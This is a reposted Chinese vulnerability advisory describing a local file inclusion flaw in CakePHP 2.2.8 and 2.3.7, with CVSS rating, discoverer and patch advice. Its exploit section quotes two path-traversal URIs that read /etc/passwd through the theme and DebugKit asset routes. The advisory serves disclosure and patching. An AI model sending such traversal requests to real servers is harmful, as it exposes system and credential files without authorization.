栏目导航: 首页 > 漏洞预警 > 程序漏洞 > 内容

CakePHP 2.x文件包含漏洞

www.hx99.net    时间: 2015-04-22    阅读: 次     整理: 华西安全网

CNVD-ID CNVD-2013-12408
发布时间 2013-08-16
危害级别 中 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
影响产品 CakePHP CakePHP 2.2.8
CakePHP CakePHP 2.3.7
 
BUGTRAQ ID 61746 
 
漏洞描述 CakePHP是一款用PHP构建Web站点的辅助工具。 

CakePHP存在本地文件包含漏洞,攻击者可以利用此漏洞包含任意本地文件到服务器。
 
参考链接 http://www.securityfocus.com/bid/61746/discuss
 
漏洞解决方案 请安装厂商已发布的最新版本或补丁: 
http://cakephp.org/
 
漏洞发现者 Takeshi Terada of Mitsui Bussan Secure Directions, Inc.
厂商补丁 CakePHP文件包含漏洞的补丁
验证信息 (暂无验证信息)
报送时间 2013-08-15
收录时间 2013-08-19

exploit

CakePHP AssetDispatcher Class Local File Include Vulnerability

An attacker can exploit this issue using a web browser. 

The following example URIs are available: 

http://www.example.com/cakephp-2.3.7/theme/Test1/%2e.//%2e.//%2e.//%2e. //%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e./etc/passwd 

http://www.example.com/cakephp-2.3.7/DebugKit/%2e.//%2e.//%2e.//%2e.// %2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e.//%2e./etc/passwd

链接:http://www.securityfocus.com/bid/61746/exploit

本文来源:华西安全网[http://www.hx99.net]
发表评论】【告诉QQ好友】【错误报告】【加入收藏】【关闭